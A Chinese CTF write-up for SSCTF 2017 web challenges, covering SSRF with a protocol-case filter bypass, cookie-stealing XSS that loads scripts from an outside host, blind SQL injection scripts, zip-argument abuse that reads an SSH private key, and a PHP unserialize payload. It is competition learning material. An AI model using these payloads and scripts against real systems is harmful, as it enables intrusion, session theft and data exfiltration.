忙乎了兩天

撿嗎(web100)

tip已經(jīng)說明過程
web100 ssrtf過程 http://120.132.21.19/ -> 10.23.173.190/news.php ->ftp://172.17.0.2

http://120.132.21.19/news.php?url=10.23.173.190/news.php?url=FTP://172.17.0.2/flag.txt

協(xié)議名對大小寫不敏感，所以可以利用FTP這樣大寫繞過過濾。

此攻擊鏈略復(fù)雜，加上總多選手的爆破，做起來很麻煩。
其中ftp這個點(diǎn)，如果是利用gopher連接服務(wù)去看是否有數(shù)據(jù)返回從而判斷是端口否有開放，這樣的做法不適合ftp，當(dāng)時還想著利用超時(連接服務(wù)時不發(fā)生送數(shù)據(jù)會導(dǎo)致一直連接)來進(jìn)行端口判斷。

彈幕(web200)

彈幕是通過websockets發(fā)的，這里其實(shí)坐等大佬的payload上來就好啦。

<img src="/static/images/welcome.gif" onload="c=encodeURIComponent(document.cookie);if(c.length>32){a=new Image();a.src='/xssHentai/request/1/?body='+c;}">

這樣可以看到，是可以通過img執(zhí)行js代碼

<img src="x" onerror=jQuery.getScript(String.fromCharCode(104,116,116,112,115,58,47,47,120,46,115,101,99,98,111,120,46,99,110,47,116,85,74,89,67,52))>

式咋提交，其實(shí)也是很蒙蔽，因為彈幕中有比賽選手各種xss，莫名其妙的感覺flag過來了

白嗎(web300)

如果沒有web1的FILE協(xié)議對此題的源碼(/var/www/submit.php)獲取，我估計我還在糾結(jié)假的注入、假的后臺、假的zip、假的探針、假的phpmyadmin....都是假的

<?php header("CONTENT-TYPE:text/html;charset=UTF-8"); define("HOST","127.0.0.1"); define("USERNAME","root"); define("PASSWORD",""); $con=new mysqli(HOST,USERNAME,PASSWORD,"ctf1"); if(!$con){echo $con->error;exit("aaaa"); } if(!$con->select_db("ctf1")){echo $con->error; } if(!$con->query("SET NAMES utf8")){echo $con->error; }$xss=$_POST["sub"]; $str = addslashes($xss);class Action { function get_outer() { $url = 'http://www.ip138.com/ip2city.asp'; $info = file_get_contents($url); preg_match('|<center>(.*?)</center>|i', $info, $m); return $m[1]; } function get_inter() { $onlineip = ''; if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip; } }$p = new Action(); $intip = $p->get_inter(); $outip2= $intip; @mkdir("/tmp/ids",0777,true); $sql="insert into ctf1(xss,ip,time,wai_ip) values('$str','$intip',NOW(),'$outip2')";if($str=$con->query($sql)){echo "<script>alert('success');window.location.href='index.php'</script>";$insertid = mysqli_insert_id($con);file_put_contents("/tmp/ids/".$insertid,"a"); } else {echo "<script>alert('fail');</script>"; } ?>

開始還以為是注入

def exp(n):global datafor i in range(33,127):#for ii in 'root':#i = ord(ii)flag = 1url = "http://120.132.20.149/submit.php"sql = "select count(SCHEMA_NAME) from information_schema.SCHEMATA limit 1,1"sql = "select table_name from information_schema.TABLES where TABLE_SCHEMA=0x63746631 limit 0,1"#sql = "select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x63746631 and TABLE_NAME=0x63746631 limit 2,1"#sql = "select user from mysql.user limit 4,1"#sql = "select count(ip) from ctf1"payload = "A'-(if(ord(mid((%s),%d,1))=%d,sleep(2),1))-'" % (sql,n,i)print payloadh = {'X-Forwarded-For' : "A'",'X-Forwarded' : "A'",'Client-IP' : payload}r = requests.get(url,headers=h)try:res = requests.get(url,headers=h,timeout=2)#print res.contentexcept:print chr(i)data[n] = chr(i)print "Data %dth: %s" % (n,data[n])flag = 0breakif flag:exit()

然后根據(jù)前面submit.php的變量$xss就猜到是xss,但是!!!第一天測試的時候bot好像是掛著的!導(dǎo)致一直沒弄成功,后面就一直想能不能日下這臺服務(wù)器,因為mysql的密碼是空的(想通過ssrf連接mysql服務(wù),當(dāng)然只是想想,主要是mysql還有交互過程導(dǎo)致失敗)

最后就是通過submit.php直接提交script標(biāo)簽代碼，然后就可以收到數(shù)據(jù).

<script src=https://x.secbox.cn/tUJYC4></script>

b9557ee76eeb61cadda090855a47d266-1.php再讀取flag http://120.132.21.19/news.php?url=10.23.173.190/news.php?url=FILE:///var/www/admin/js.php

憑借代碼應(yīng)該是想考察xss去獲取源代碼的，可惜web1可以穿

WebHook(web500)

https://github.com/howmp/webhook

先為這個題目的點(diǎn)個贊.雖然不知道考啥,感覺自己也是投機(jī)取巧做出來的.

這個代碼整個邏輯流程就是，選手先添加遠(yuǎn)程github鏈接，然后再進(jìn)行pull，最后還能夠下載自己項目的zip

本地測試的時候debug報錯有泄露app.config['SECRET_KEY']，可惜后面關(guān)掉了debug。

http://webhook.ssctf.seclover.com:8000/webhooklog

其中pass是選手設(shè)置的密碼+app.config['SECRET_KEY']值，后面解密幾個發(fā)現(xiàn)secret_key就是ssctf

先添加項目地址: http://webhook.ssctf.seclover.com:8000/addrepo?repo=t&key=05dec173a9b6862b26b05f2b4d0c521a&url=https://github.com/l3m0n/t.git&pass=1234asdeqwasdasdqwsad12adsd再獲取-打包項目: http://webhook.ssctf.seclover.com:8000/push POST數(shù)據(jù): {"repository":{"name" : "t"},"ref" : "refs/heads/master" }

其中項目中可以通過build.json文件中的include來控制zip的壓縮路徑.

args = ['zip', '-r',os.path.join(outpath, str(int(time.time())) + '.zip')] if os.path.isfile(os.path.join(basedir, 'build.json')):b = json.loads(open(os.path.join(basedir, 'build.json')).read())for x in b.get('include', [basedir]):args.append(x)for x in b.get('exclude', []):args.append("-x")args.append(x)p = subprocess.Popen(args, cwd=basedir)

下載了一下/var/www/路徑的東西，其中有一個flag的項目，但是git log看了一下還是沒啥結(jié)果，后面放了一個tip，感覺是有點(diǎn)迷，但是大概知道commit里面是不存在flag.

webhook題目，flag在flag項目中，但在commit真正的flag的時候，webhook已經(jīng)被刪掉了

還有一個.bash_history，應(yīng)該是前面的人通過命令執(zhí)行然后遺留的.提取一下關(guān)鍵的幾個命令信息.

cat /home/www-data/.ssh/id_rsa cat /home/www-data/.ssh/id_rsa.pub ssh -T git@git.coding.net -i id_rsa git clone https://git.coding.net/ljgame/flag.git

這個是通過git拉取私有項目的步驟.

配置/root/.ssh/config Host ljgame.git.coding.netHostName git.coding.netUser gitIdentityFile /home/www-date/.ssh/id_rsassh -T git@git.coding.net -i id_rsa git clone git@ljgame.git.coding.net:ljgame/flag.git

最后就能夠拉取到這個私有項目，獲得flag.

CloverSec Logos(web500)

http://60.191.205.80/picture.php?id=1 存在注入，對空格和or這些有過濾，但是很好繞過。寫成腳本

import requestsurl = "http://60.191.205.80/picture.php?id="#c = "0123456789abcedf" #sql = "select(column_name)from(infoorrmation_schema.columns)where(table_name)='user'%0blimit%0b2,1" sql = "select(passwoorrd)from(user)where(username)='admin'" f = 0 out = ""for i in range(1,200):print if = 0for c in range(33,128):payload = '0"||if(ascii(mid(('+sql+'),'+str(i)+',1))='+str(c)+',1,0)||"a'#print payloadres = requests.get(url+payload)if "not found!" not in res.content:print cout = out + chr(c)f = 1print outbreakif not f:print "output: " + outexit()print "output: " + out

跑得admin的密碼為14aceb3fc5992cef3d97，長度為20，另一個表名是Dede_CMS，前3后1截得的16位去解密得到密碼為admin^g。
兩處源碼泄漏：index.php.swp，include.php.swp。源碼很明顯的反序列去讀flag文件，有一些簡單的限制，路徑可以在前面加./，用自己服務(wù)器echo出來1234，序列化字符串中類名長度前加個+號。最后的payload

GET /index.php?action=imformation&secret=http://x.x.x.x/1.php HTTP/1.1 Host: 60.191.205.80 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=ps3s1c2479tbi9ahmmmrj5ubd3; Tips=token+will+be+unserialize;token%3dO%3a%2b4%3a"Read"%3a1%3a{s%3a4%3a"file"%3bs%3a16%3a"./ssctf_flag.php"%3b} Connection: close

轉(zhuǎn)載于:https://www.cnblogs.com/iamstudy/articles/ssctf-2017-web-writeup.html

總結(jié)

以上是生活随笔為你收集整理的SSCTF-2017-web-writeup的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。